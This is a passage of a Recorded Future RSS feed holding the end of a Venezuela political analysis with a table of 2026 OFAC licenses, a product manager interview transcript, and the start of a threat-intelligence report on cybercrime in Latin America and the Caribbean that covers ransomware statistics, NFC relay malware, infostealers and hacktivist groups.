greeting them affectionately.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_143aa6ed2eebd4cdc806f2d890d690d017670ae16.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="909" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Screenshot of Venezuelan state TV broadcast showing Chinese ambassador Lan Hu, Russian ambassador Sergey Mélik-Bagdasárov, and Iranian ambassador Ali Chegueni prominently seated at Venezuelan Acting President Delcy Rodríguez’s January 5, 2026, swearing-in ceremony (Source:</em> <em><a href="https://www.youtube.com/watch?v=3oMay9b3BnI&amp;t=398s">Telesur</a>)</em></div>
          </div>
        </div>
        <p>Such gestures will very likely continue as they offer Rodríguez a way to preserve credibility among PSUV elites and everyday party faithful. She can claim that her rapidly evolving relationship with Washington is a sovereign decision that improves stability and living conditions, rather than a relationship that is shaped by a drastically uneven playing field. As part of presenting an image of mixed compliance with Washington’s demands for Venezuelan audiences, she will almost certainly continue insisting that Maduro remains the legitimate president and demand his return, even as she works to consolidate her own power.</p>
        <h3>Leveraging Hardliners to Justify Non-Compliance</h3>
        <p>The internal rivalries identified above represent significant threats to Rodríguez’s legitimacy inside the PSUV and her claim to power, and attempting to balance her coalition while consolidating her control will almost certainly be a major challenge for Rodríguez. However, it is likely that Rodríguez will, over time, point to alleged hardliners to justify selective non-compliance with US aims, credibly or otherwise. Ultimately, it may be useful for Rodríguez to be able to point to ongoing tensions in her coalition or the prospect of instability as a way of warding off US pressure for an eventual transition or for competitive elections to be held. This justification is likely to lose credibility over time if she continues to consolidate administrative control and accumulate legitimacy, especially if she presides over significant economic gains amid US sanctions relief. Ultimately, the very steps that allow her to consolidate her rule may eventually be used by Washington to justify accelerating the end of it.</p>
        <h3>Resistance to Elections if Seen as an Existential Threat</h3>
        <p>Rodríguez’s past political experience and the PSUV’s record across more than 25 years of governing suggest the Venezuelan government will very likely seek to maximize political gain from any economic growth resulting from US sanctions relief and economic normalization. And while US officials have routinely conveyed that they expect elections to be held in the next two years, the Venezuelan government is almost certain to resist or sabotage elections unless it perceives that economic improvement has boosted the PSUV’s chances of winning a competitive election. Even then, the PSUV will very likely seek to use its control of government to activate patronage networks, divert public resources to politicized social programs, and attempt to present legal obstacles to opposition campaigning — just as it did in the lead-up to the 2024 presidential election.</p>
        <p>Ultimately, this logic is consistent with how Chavista elites have historically conceptualized elections: In multiple instances of US-backed talks meant to offer sanctions relief in exchange for competitive elections, Venezuelan government negotiators routinely <a href="https://www.wola.org/wp-content/uploads/2021/07/WOLA-USIP-Report.pdf">argued</a> that elections can be considered “fair” only if voters can judge the government without the distorting economic effects of sanctions. If economic growth does not translate into a boost in popular support for the ruling party, Rodríguez will likely come under increasing pressure from rivals to resist a US-backed transition. It is therefore likely that democratization in Venezuela will be phased and gradual, not immediate, and will likely depend in large part on whether elements of the ruling elite see a viable future for themselves in the country as a possible outcome after alternating power.</p>
        <h2>Outlook</h2>
        <p>Over the coming months, Delcy Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while still finding ways to cooperate with the United States that preserve her rule and credibility inside the ruling PSUV coalition. In the short- to mid-term, the main challenge she faces is the threat posed by internal rivals who may feel threatened by her reforms. This makes her cabinet changes, and evidence of backlash among political and economic elites, crucial variables to watch. In confronting internal threats to her rule, she will likely pursue a strategy of coalition management over one of open confrontation. Even as Rodríguez continues to consolidate power and tries to keep hardline rivals contained, she will likely avoid high-risk moves that could fracture elite support and risk threatening her relationship with Washington.</p>
        <p>In the short and mid terms, the main flashpoints will be US pressure to end Caracas’s relationships with Moscow, Beijing, and other US adversaries, as well as US pressure to hold competitive elections in the next two years and eventually to advance a political transition. Rodríguez and PSUV elites likely view a genuinely competitive presidential vote as an existential threat. As a result, the government is almost certain to resist or sabotage competitive elections unless economic improvement significantly boosts the PSUV’s electoral odds. Even then, it would likely use patronage, politicized social programs, and legal obstacles to constrain opposition campaigning and preserve an institutional advantage. This raises the prospect of instability both in the lead-up to and in the aftermath of any elections, given the likelihood of opposition protests and an associated crackdown. Given these dynamics, any transition is more likely to be phased and gradual than immediate, with stability hinging on whether Rodríguez is able to consolidate support among the ruling elite and whether the broader Chavista coalition can see a viable future for itself under any eventual alternation of power.</p>
        <h2>Appendix A: 2026 OFAC Licenses Issued for Venezuela</h2>
        <table>
          <thead>
            <tr>
              <th>Date Issued</th>
              <th>Title (Hyperlink)</th>
              <th>Scope</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>February 3, 2026</td>
              <td><a href="https://ofac.treasury.gov/recent-actions/20260203">Venezuela General License 47: “Authorizing the Sale of U.S.-Origin Diluents to Venezuela”</a></td>
              <td>Authorizes US persons to export, reexport, sell, or supply US-origin diluents to Venezuela, even when transactions involve the Government of Venezuela, PDVSA, or PDVSA-majority entities, as long as contracts are governed by US law and disputes are resolved in the US</td>
            </tr>
            <tr>
              <td>February 10, 2026</td>
              <td><a href="https://ofac.treasury.gov/recent-actions/20260210_33">Venezuela General License 46A: “Authorizing Certain Activities Involving Venezuelan-Origin Oil”</a></td>
              <td>Authorizes “established US entities” to engage in transactions that are ordinarily incident and necessary to the lifting, export/reexport, sale/resale, supply, storage, marketing, purchase, delivery, transportation, and refining of Venezuelan-origin oil, including related logistics, even when the activity involves the Government of Venezuela, PDVSA, or PDVSA-majority entities</td>
            </tr>
            <tr>
              <td>February 10, 2026</td>
              <td><a href="https://ofac.treasury.gov/sanctions-programs-and-country-information/venezuela-related-sanctions">Venezuela General License 48: “Authorizing the Supply of Certain Items and Services to Venezuela”</a></td>
              <td>Authorizes the provision from the US of goods, technology, software, and services needed for oil and gas exploration, development, production, and maintenance in Venezuela, even when transactions involve the Government of Venezuela and PDVSA</td>
            </tr>
            <tr>
              <td>February 13, 2026</td>
              <td><a href="https://ofac.treasury.gov/recent-actions/20260213">Venezuela General License 49: “Authorizing Negotiations of and Entry Into Contingent Contracts for Certain Investment in Venezuela”</a></td>
              <td>Authorizes otherwise prohibited transactions that are “related to the negotiation of and entry into” contingent contracts with the Government of Venezuela, PDVSA, or PDVSA-majority-owned entities, so long as the contract’s performance is expressly contingent on separate OFAC authorization</td>
            </tr>
            <tr>
              <td>February 13, 2026</td>
              <td><a href="https://ofac.treasury.gov/recent-actions/20260213">Venezuela General License 50: “Authorizing Transactions Related to Oil or Gas Sector Operations in Venezuela of Certain Entities”</a></td>
              <td>Authorizes transactions related to oil or gas sector operations in Venezuela conducted by specified companies and their subsidiaries, provided contracts are governed by US law (with disputes resolved in the US) and most payments to blocked persons (including taxes/royalties) are routed to specified US-directed deposit funds</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong></em> <em>A list of OFAC general licenses issued since the passage of the Venezuela hydrocarbons law (Source: US Office of Foreign Assets Control)</em></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1d08f25ae63a57a954e41789fb5634f3df6f8a5c5.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Day in the Life: Product Manager at Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/blog/kyle-kohler-product-manager</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/kyle-kohler-product-manager</guid>
            <pubDate>Fri, 03 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[VentureFizz interviews Senior Product Manager Kyle Kohler on his role at Recorded Future]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>Recorded Future is the World’s Largest Intelligence Company. Our team works to build products that customers love. In this video, Kyle Kohler interviewed with VentureFizz about his day-to-day as a Senior Product Manager for Integrations. He describes the job as truly multifaceted, encompassing starting new strategic initiatives, turning customer feedback into improvements, and enabling other team members to do the same. The full video and transcript are available below.</div>
          </div>
        </div>
        <div>
          <div>
            <div><a href="https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s">https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s</a></div>
          </div>
        </div>
        <p><strong>Read the Full Video Transcript:</strong></p>
        <p>I’m Kyle Kohler. I’m a product manager over the integration strategy at Recorded Future.</p>
        <p>Recorded Future is the world’s largest threat intelligence provider. We are covering all sorts of domains of intelligence. It’s geopolitical intelligence, cyber intelligence, payment fraud intelligence. And essentially intelligence is this data that an organization uses to take action and make a better decision. So the more that you understand a subject or topic, a current event, the better that you can define what actions you take to either defend your organization or proactively increase your competitive edge.</p>
        <p>As a product manager, it’s funny. I see it as this arsonist, firefighter, educator role. And I think that definitely needs to be unpacked a bit. As an arsonist, you’re starting fires. So, very strategically, which fire do I put under which team, under which initiative, which fire do I stoke and which one do I burn hotter? And as a firefighter, you’ve got maybe fires coming in being reported to you from a customer, from an organization, from another product team who needs this other product team to make something happen. And so, you’re very strategically figuring out what to stamp out, what to stoke. And as an educator, you’re also teaching others how to start fires and put out fires. So, you’re constantly going from one thing to the next and keeping all of these moving pieces going. There’s no one project that you just shepherd along and that’s the only thing you work on. You’re constantly context switching, and a good product manager has that multi-domain knowledge to think laterally, but also track how this thing affects that thing and how it might affect the other thing in the future.</p>
        <p>At Recorded Future, we’re a global organization and I’m based on the west coast of California. So I wake up in the morning and the first thing I’ve got are 10 to 12 Slack messages from across the globe that come in from different geographies. Other people are ending their day and they’ve got some questions that maybe I can answer, or they’re looking for direction on who might have the right answer. So the first thing generally starts with voraciously checking Slack, and I’m answering notifications and, as I mentioned, questions. And the next thing is, okay, well, from the answers to those questions, are there new initiatives that need to get spun up, or are there existing initiatives that need to get nudged along, or are there certain fires that need to get stamped out? And that’s the whole day: you’re really tracking where things are in their current state, what needs to get responded to, and what needs to get pushed along.</p>
        <p>Recorded Future really was attractive to me because it was a pretty new field within cyber security and within technology, but also, as a company, it was not just related to IT and cyber; it had this geopolitical and payment fraud type of angle looking at the world. So it was really taking a big data problem: how do you track everything that happens everywhere, but then how do you break that down into these bite-sized pieces that ultimately help an organization’s current mission? So I really was attracted by the fact that we are helping organizations secure the world. We’re able to do that by securing the world with intelligence, but it’s so multi-domain that you’re just never going to get bored. There’s always something new. There’s always something to track. There’s always some new threat. There’s always some new initiative, some new innovation. And Recorded Future has really been at that cutting edge of innovation. Always coming up with what’s next in the market, what’s next in the threat landscape, and how will we as a company address supercharging the existing missions of the organizations that we help today.</p>
        <p>Original content: <a href="https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/">https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1c70771f1d2a1c1ea57a0c8903617a776599d63c7.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America and the Caribbean Cybercrime Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This report provides an overview of trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>This report provides an overview of trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025. Insikt Group found that threat actors operating in or targeting the LAC region predominantly use client-server applications and end-to-end encrypted messaging platforms such as Telegram, as well as established English- or Russian-speaking dark web and special-access forums, to communicate and conduct activities. Threat actors demonstrate increased sophistication in their operations, adapting their tactics, techniques, and procedures (TTPs) over time, while still relying primarily on traditional methods such as phishing and social engineering, malware distribution, and ransomware. Based on our analysis, we have determined that Brazil, Mexico, and Argentina were the countries most targeted by financially motivated cybercriminals, likely because they are LAC's largest economies. Additionally, based on this research, Insikt Group found that threat actors often targeted critical industries such as healthcare, finance, and government because they hold high-value data, face operational urgency, and, at times, rely on legacy systems that may be vulnerable.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group assesses that criminal forum DarkForums and the messaging platform Telegram are the primary special-access forums and communications platforms used by threat actors operating in or targeting the LAC region.</li>
          <li>Threat actors operating in or targeting LAC are typically financially motivated and frequently leverage social engineering, ransomware, and various forms of mobile malware to gain initial access to government, healthcare, and financial institutions.</li>
          <li>In 2025, Insikt Group recorded 452 ransomware incidents impacting the LAC region. The top five industries affected were healthcare, manufacturing, government, information technology, and education, all of which observed a noticeable increase in attacks compared to the previous year.</li>
          <li>Insikt Group continued to identify banking trojans being leveraged by threat actors, with established variants being the most widely used. Specifically, threat actors used banking trojans in targeted smishing campaigns aimed at WhatsApp users to gain access to financial data and steal credentials.</li>
          <li>Insikt Group identified LummaC2 as the most prolific information stealer (infostealer) affecting organizations in LAC in the first half of 2025 and Vidar in the second half, following law enforcement disruption of LummaC2.</li>
        </ul>
        <h2>Background</h2>
        <p>In the <a href="https://digiamericas.org/wp-content/uploads/2025/06/FinancialSector_EN.pdf">aftermath</a> of the COVID-19 pandemic, the LAC region underwent rapid digital development that outpaced security maturity, leading to asymmetrical cloud adoption, reliance on legacy infrastructure, and the introduction of remote work across all verticals. Many organizations adopted software-as-a-service (SaaS) platforms without effectively implementing strong access controls or multi-factor authentication (MFA) methods, leaving them exposed to ransomware and data theft, among other cyberattacks. Economic instability (inflation and currency controls) in LAC countries has created incentives for cybercrime while weakening institutional defenses. Political volatility, social protests, and corruption have created new opportunities for financially and politically motivated threat actors. Compounded factors such as high youth unemployment, income inequality, and the influence of informal economies have driven individuals to seek alternative sources of income, which in turn fuels much of the cybercrime we see today.</p>
        <p>According to a World Economic Forum report, <a href="https://www.weforum.org/press/2026/01/cyber-enabled-fraud-is-now-one-of-the-most-pervasive-global-threats-says-new-report-45dc3f679b/">13%</a> of respondents in the LAC region expressed low confidence in their country’s preparedness to respond to significant cyber incidents. Despite significant <a href="https://publicadministration.un.org/egovkb/en-us/Reports/UN-E-Government-Survey-2024">progress</a> in digital government, regulatory advancements, and investments in the region, many countries still lack the technical competence in their workforce and the resources to sustainably harden their environments. Many LAC government networks hold large amounts of sensitive data but are <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">deficient</a> in their security best practices, leaving their systems vulnerable to cyberattacks. Large breaches are routinely circulated, recycled, and resold on dark web marketplaces, enabling identity theft, synthetic identity fraud, SIM swaps, and account takeovers, among other types of cybercriminality to flourish at a larger scale.</p>
        <p>Although the LAC region has made significant technological advancements, particularly in the financial services sector, innovations are creating new challenges. The financial technology industry has introduced mobile banking applications, digital wallets, and instant payment systems. LAC countries face rising levels of cyber-enabled fraud in the financial sector because real-time payment rails have weaker identity verification controls, rendering social engineering attempts more effective. Instant payment systems, such as Brazil’s PIX and similar mobile banking platforms, have often been targeted by threat actors. With faster transaction speeds at higher volumes, detection and recovery efforts have become increasingly complex, making scams significantly more profitable and scalable.</p>
        <p>The LAC region has the world's fastest-growing <a href="https://openknowledge.worldbank.org/server/api/core/bitstreams/692c6149-748f-40dc-b9e6-8e09ba3e47bf/content">rate</a> of disclosed cyber incidents, though many remain unreported. <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">Only</a> seven LAC countries have plans to protect their critical infrastructure from cyberattacks, and only twenty have Computer Security Incident Response Teams (CSIRTs). Despite <a href="https://unctad.org/page/cybercrime-legislation-worldwide">31</a> LAC countries having some form of legislation addressing cybercrime, many face skills shortages, creating barriers to enforcement. Limited law enforcement resources and unreliable interstate cooperation further delay investigation and prosecution, enabling threat actors to operate across jurisdictions with relative ease. A cultural perception that cybercrime carries low risk and offers high reward undermines the deterrent effect that reliable law enforcement action would otherwise have. This incentive structure, coupled with reduced stigma, encourages repeat offenses and recruitment, as reflected in the cybercriminal trends observed by Insikt Group in 2025.</p>
        <h2>Cybercriminal Activities in LAC</h2>
        <p>Throughout 2025, Insikt Group investigated and identified different types of cybercriminals operating on clearnet and dark web sources. Cybercriminals routinely leveraged phishing for initial access, and among the most common methods seen was the search and collection of sensitive information directly from a compromised host's file system or databases. This technique is often a critical pre-exfiltration step used to obtain financial records, passwords, and other forms of personally identifiable information (PII), likely to conduct account takeovers or fraud. Insikt Group research found that cybercriminals have also begun evolving their TTPs to exploit near-field communications (NFC) to commit financial fraud and are using malware to target cryptocurrency wallets. Insikt Group intelligence indicates that cybercriminals are primarily interested in selling compromised databases and access methods, as well as participating in hacktivist collectives. In some instances, advanced persistent threats (APTs) have also begun to overlap their activities with cybercrime when targeting the region.</p>
        <h2>Cybercriminal Sources</h2>
        <p>Threat actors operating in or targeting the LAC region continued to rely on the infrastructure of established English- and Russian-speaking forums throughout 2025 (see <strong>Appendix A</strong>). Insikt Group identified Spanish- and Portuguese-language postings on several established dark web and special-access forums. Even though these sources are predominantly English- and Russian-speaking, these posts likely indicate a preference among threat actors targeting LAC to seek more established, traditional platforms for conducting business. Research showed that low- to moderate-tier forums are most commonly used by threat actors based in or targeting LAC countries, possibly suggesting lower levels of sophistication, as higher-tier forums often require vouching, payment, demonstration of knowledge or technical abilities, and sometimes private invitation to gain access.</p>
        <p>Insikt Group assesses that most communications between threat actors likely occur on encrypted messaging platforms such as Telegram, WhatsApp, and Signal due to speed, ease of access, and higher levels of trust among group members. Given the privacy-enhancing features of many of these platforms, collection efforts can become significantly more constrained. Telegram is predominantly used because it offers larger channel and group capacities, account creation is simple, it enables threat actors to leverage bot automation and support for their malicious activities, and content moderation is typically less stringent than on other platforms. Because these platforms offer a path of least resistance, threat actors enjoy the added privacy that end-to-end encrypted messaging provides without delaying their operations.</p>
        <p>Financially motivated threat actors often advertise a variety of data types, including PII, financial data, login credentials, system access credentials, exploits and vulnerabilities, malware, ransomware, and hacking tutorials. In some instances, Insikt Group observed threat actors selling customer relationship management (CRM) access, virtual private network (VPN) access with domain user privileges and local administrator rights on a database server, and command-and-control (C2) access to LAC-based entities in 2025. Leveraging this access to information, cybercriminals may facilitate further crimes, including but not limited to extortion attempts, digital and social engineering scams, ransomware deployment, data theft, and account takeovers. Insikt Group research indicates that threat actors generally advertise breached databases and payment card data because they can be lucrative, require relatively low levels of sophistication, and are sought after by other cybercriminals.</p>
        <p>Threat actors often target government systems because they contain highly sensitive data that can be profitable for scams, identity theft, or extortion. For instance, shortly after a tense general election, Ecuador’s legislature, the National Assembly, <a href="https://therecord.media/ecuador-national-assembly-cyberattack">reported</a> it had suffered two cyberattacks aimed at accessing confidential data and disrupting the availability of information services. In another example, threat actors exposed sensitive data on millions of Paraguayan citizens on the dark web; among the alleged exfiltrated data are national ID numbers, dates of birth, physical addresses, and health service records.</p>
        <p>DarkForums was the primary dark web and special-access forum where Insikt Group recorded the most posts relating to cybercrime-related events in Spanish and Portuguese in 2025. This forum is an English-language, low-tier forum operated by English-speaking administrators, launched in March 2023, and is accessible via a clearnet domain. Additionally, DarkForums was observed hosting leaked databases and data breaches involving Spanish-speaking countries, with posts describing the compromise of thousands of records and credentials. Other forums, such as XSS, Exploit, RehubcomPro, Cracked, BreachForums 2, ProCrd, and CrdPro, were also among the top forums to contain posts in Spanish and Portuguese. <strong>Appendix A</strong> presents a sample of Spanish and Portuguese forum threads from these sources.</p>
        <h2>Cybercriminal Tactics and Attack Vectors</h2>
        <p>The LAC region has a long history of financially motivated cybercrime; as a result, Insikt Group observed in this analysis that threat actors continue to heavily target the financial sector. Threat actors typically rely on traditional initial access methods, such as phishing via email, SMS, and WhatsApp messages that impersonate financial institutions and request invoices or payments. Lures are delivered as malicious links that redirect to fake login pages, or as malicious attachments with embedded links. Many of these techniques are effective when targeting entities in the LAC region due to an overwhelming reliance on email and messaging applications for business, as well as a generally strong trust in branded communications. Artificial intelligence (AI) has introduced more sophisticated methods into the cybercriminal ecosystem in LAC, lowering the barrier to entry for threat actors and significantly increasing the scalability of attacks through automation. AI helps threat actors create more effective phishing messages that can be generated in native Spanish or Portuguese, rendering them more convincing to the local target audience. The advent of <a href="https://publications.iadb.org/en/publications/english/viewer/2025-Cybersecurity-Report-Vulnerability-and-Maturity-Challenges-to-Bridging-the-Gaps-in-Latin-America-and-the-Caribbean.pdf">agentic AI</a> also presents new opportunities and attack vectors for cybercriminal groups to exploit and greatly facilitates cybercrime-as-a-service. Organized criminal groups have <a href="https://www.fiap.gob.es/wp-content/uploads/2024/11/ELPACCTO2-IAyCrimen-EN.pdf">integrated</a> AI into their operations to assist with drug smuggling, money laundering, cyber-enabled fraud, and malware development.</p>
        <p>Throughout 2025, Insikt Group observed threat actors targeting the LAC region by compromising remote desktop protocol (RDP), VPNs, and web admin panels, and obtaining credentials from prior infostealer infections, password reuse, brute-force attacks, and other initial access points. Based on data within the Recorded Future Intelligence Operations Platform, there are approximately 29,000 references to exposed LAC-related credentials on Russian Market. These exposed credentials are from domains belonging to the top organizations (by revenue) in the healthcare, government, and financial sectors across the five largest economies in LAC. Russian Market is one of the leading dark web marketplaces for the sale and distribution of infostealer logs. Most of these logs were from LummaC2 and then Acreed Stealer, consistent with what Insikt Group observed in its review of additional infostealer logs. It should be noted that many of the 29,000 exposed credentials likely belong to customers of these organizations rather than employees, as Recorded Future does not have access to internal-facing employee domain addresses to search for exposed credentials; however, those can be added by an end user. Insikt Group assesses that these attack vectors were likely effective for infiltrating the systems of targets in the LAC region due to increased remote work adoption, legacy infrastructure in many public institutions, and limited monitoring and resources. Insikt Group observed threat actors advertising carding tools, bulk SMS/email blasting, SIM swapping, hacking assistance, and other similar services on Telegram channels.</p>
        <p>In 2025, Insikt Group observed a rise in novel types of malware that actively leverage and exploit NFC. First <a href="https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil">identified</a> by Threat Fabric, PhantomCard is an Android trojan, notably a variant of China-origin NFC relay malware-as-a-service (MaaS), primarily <a href="https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil">targeting</a> banking customers in Brazil. PhantomCard enables relay attacks by obtaining NFC data from a victim's banking card and transmitting it to a threat actor's device to perform transactions at point-of-sale (POS) systems or ATMs. PhantomCard is distributed via malicious webpages that impersonate legitimate applications, prompting victims to tap their cards and enter their personal identification numbers (PINs) for authentication. Once credentials are fraudulently obtained, they are relayed to attackers.</p>
        <p>Similarly, in late 2025, threat actors deployed RelayNFC, a mobile malware that targets contactless payment cards, in a phishing campaign targeting Brazilian users. This evolution in TTPs parallels the shift by threat actors from skimming magnetic stripe data to “shimming” Europay, Mastercard, and Visa (EMV) chip data in the payment fraud ecosystem, since unique cybercriminal solutions typically follow new security innovations.</p>
        <p>Per the 2025 Cybercriminal Cryptocurrency Annual Activity Report, Insikt Group consistently observed activity in which cryptocurrency wallets were targeted by various forms of malware, such as drainers, clippers, and miners, to steal funds. Given the persistent lag in cybersecurity measures in LAC and the rapid growth of the cryptocurrency market in the LAC region, its users may become attractive targets for cybercriminals. The top <a href="https://www.chainalysis.com/blog/latin-america-crypto-adoption-2025/">five</a> countries in the LAC region that dominate the cryptocurrency ecosystem are Brazil, Argentina, Mexico, Venezuela, and Colombia. However, Brazil is the clear <a href="https://www.chainalysis.com/blog/latin-america-crypto-adoption-2025/">leader</a>, accounting for a third of overall cryptocurrency activity. Insikt Group assesses that, as the mainstream adoption of cryptocurrency continues, threat actors will likely seek targets in these countries, as knowledge and security practices among the user base in these regions will likely be lacking. Additionally, as with threat actors in other regions of the world, those targeting LAC will almost certainly leverage this medium of exchange to transact and launder illicit funds. As countries continue to adopt new regulations and introduce new forms of cryptocurrency, we expect threat actors to identify new vectors for exploitation. As of 2025, Argentina, Brazil, Colombia, Ecuador, Paraguay, Trinidad and Tobago, Uruguay, and Venezuela are participating in INTERPOL’s inaugural pilot phase for the new <a href="https://www.interpol.int/News-and-Events/News/2025/INTERPOL-publishes-first-Silver-Notice-targeting-criminal-assets">Silver Notice</a>, which will be published to “help trace and recover criminal assets, combat transnational organized crime and enhance international police cooperation,” likely including cryptocurrency assets if linked to criminal proceeds.</p>
        <h2>Advanced Persistent Threats (APTs) and Cybercrime</h2>
        <p>Throughout 2025, Insikt Group observed a rise in APT activity targeting the LAC region using traditional cybercriminal methods, such as phishing and ransomware. This suggests some APT groups may also have financial motivations extending beyond seeking strategic geopolitical influence. Prominent APTs, such as Dark Caracal, conducted cyber espionage and delivered the Poco RAT via financial-themed phishing. TAG-144 (Blind Eagle) primarily targeted government entities in South American countries, notably Colombia, using TTPs such as spearphishing and remote access trojans (RATs) in campaigns blending espionage and financial motives.</p>
        <p>Insikt Group assesses that some Chinese state-sponsored activity is likely aimed at <a href="https://www.atlanticcouncil.org/commentary/the-5x5-the-state-of-cybersecurity-in-latin-america/">protecting</a> economic investments in the region, such as the Belt and Road Initiative (BRI), sovereign loans, and widespread commercial interests. In addition to the above APT groups, Chinese state-sponsored groups are also targeting entities in LAC countries. TAG-141 (FamousSparrow) leveraged SparrowDoor malware against entities in Mexico, Argentina, and Chile. Storm-2603 (Gold Salem) deployed ransomware, including Warlock, LockBit, and Babuk, targeting multiple sectors across agriculture, government, energy and natural resources, and telecommunications in the LAC and Asia-Pacific (APAC) regions. This activity may signal that China is seeking to retain influence in the LAC region through cybercriminal means or is interested in financial gain.</p>
        <h2>Hacktivism</h2>
        <p>The LAC region has repeatedly experienced periods of complex political and social unrest fueled by debates regarding economic reforms, corruption, and inequality. Unlike financially motivated cybercrime, hacktivism tends to be political or ideological, and these tense conditions can create an environment where hacktivism spikes. In late 2025, Insikt Group noticed increased activity from Chronus Team, a hacktivist group known for defacement attacks and data leaks aimed at exposing security vulnerabilities, primarily targeting organizations in Mexico. The threat group leverages Telegram channels for communication and propaganda. It has loosely aligned with other hacktivist and cybercriminal groups, such as Elite 6-27 and Sociedad Privada 157, to gain attention and increase its reputation. Insikt Group observed another trend where several hacktivist groups began transitioning to ransomware-as-a-service (RaaS) for financial gain. One such hacktivist group, “FiveFamilies”, functions as a collective of several groups; some of their targeted entities included those located in Cuba and Brazil.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1adeca9f01a5609ed0ab681070409af59d1685f44.png?width=750&amp;format=png&amp;optimize=medium" width="868" height="546" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1</strong>: Chronus Team hack and web defacement of the website for the budget transparency for the municipality of Hermosillo, Sonora, Mexico (Source: Social Media)</em></div>
          </div>
        </div>
        <h2>Malware Trends</h2>
        <p>In 2025, Insikt Group observed elevated ransomware activity targeting organizations in the LAC region. Banking trojans also remained a prominent issue affecting LAC countries, with Insikt Group noting an uptick in campaigns specifically leveraging WhatsApp for delivery. Infostealers remained a popular initial access enabler in the LAC region. Botnets have grown in the region largely due to small office/home office (SOHO) devices, such as routers and other internet-of-things (IoT) appliances with weak security, outdated firmware, and a reliance on default credentials. Botnet activity can contribute to credential theft, the propagation of phishing campaigns, the distribution of spam, the takeover and abuse of residential IP addresses, and the enabling of distributed denial-of-service (DDoS) attacks. Insikt Group also observed threat actors targeting payment terminals in 2025 with ATM and POS malware.</p>
        <h2>Ransomware</h2>
        <p>In 2025, Recorded Future’s Global Ransomware Landscape Dashboard recorded 452 ransomware incidents impacting the LAC region out of 7,346 total globally, based on all publicly known ransomware victims listed on associated ransomware blogs. Attacks on entities in the LAC region constituted just over 6% of all global ransomware attacks in 2025. The top five industries most impacted by ransomware in the LAC region in 2025 were Healthcare (36 attacks), Manufacturing (49 attacks), Government (28 attacks), Information Technology (21 attacks), and Education (20 attacks), as demonstrated in <strong>Figure 3</strong>. Insikt Group research on ransomware in the LAC region covers 27 of the 33 constituent countries. Insikt Group did not obtain ransomware data from Antigua and Barbuda, Belize, Cuba, Saint Kitts and Nevis, Saint Lucia, or Suriname in 2025.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13c187088bebe57a3ba341e5db6d3955c5db15fcd.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="545" />
            </div>
          </div>
          <div>
            <div><strong>Figure 2:</strong> Global Ransomware Landscape Dashboard view of attack metrics for the top five ransomware groups impacting LAC in 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1fa7b50698ac634f7f8edf4b0d090a89ad875dda1.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="840" />
            </div>
          </div>
          <div>
            <div><strong>Figure 3:</strong> Global Ransomware Landscape Dashboard view of attack metrics for the top five most impacted industries in LAC in 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>Insikt Group observed an increase in ransomware activity across all major industries in LAC compared to the prior year. Insikt Group specifically examined ransomware attacks against financial, government, and healthcare entities across the LAC region and identified the following: 16 attacks targeting the finance sector, 28 attacks targeting the government sector, and 36 attacks targeting the healthcare sector. <strong>Appendix C</strong> highlights a sample of these ransomware attacks.</p>
        <p>The top five countries most impacted by ransomware in the LAC region in 2025 were Brazil (128 attacks), Mexico (78 attacks), Argentina (63 attacks), Colombia (51 attacks), and Peru (27 attacks). These countries are among the largest economies in the region, which may lead to downstream spillover effects for enterprises that conduct business directly with them or with neighboring countries. Insikt Group found that the majority of ransomware groups leverage double extortion. This extortion technique involves encrypting a victim’s data, exfiltrating the data, and then threatening to publicly leak the data on the ransomware group’s name-and-shame blog if a ransom is not paid. Recorded Future assesses countries by network intrusion and ransomware targeting risk every quarter to provide awareness and help organizations assess risk exposure. Takeaways from the top five impacted countries based on metrics and analysis from Recorded Future include:</p>
        <ul>
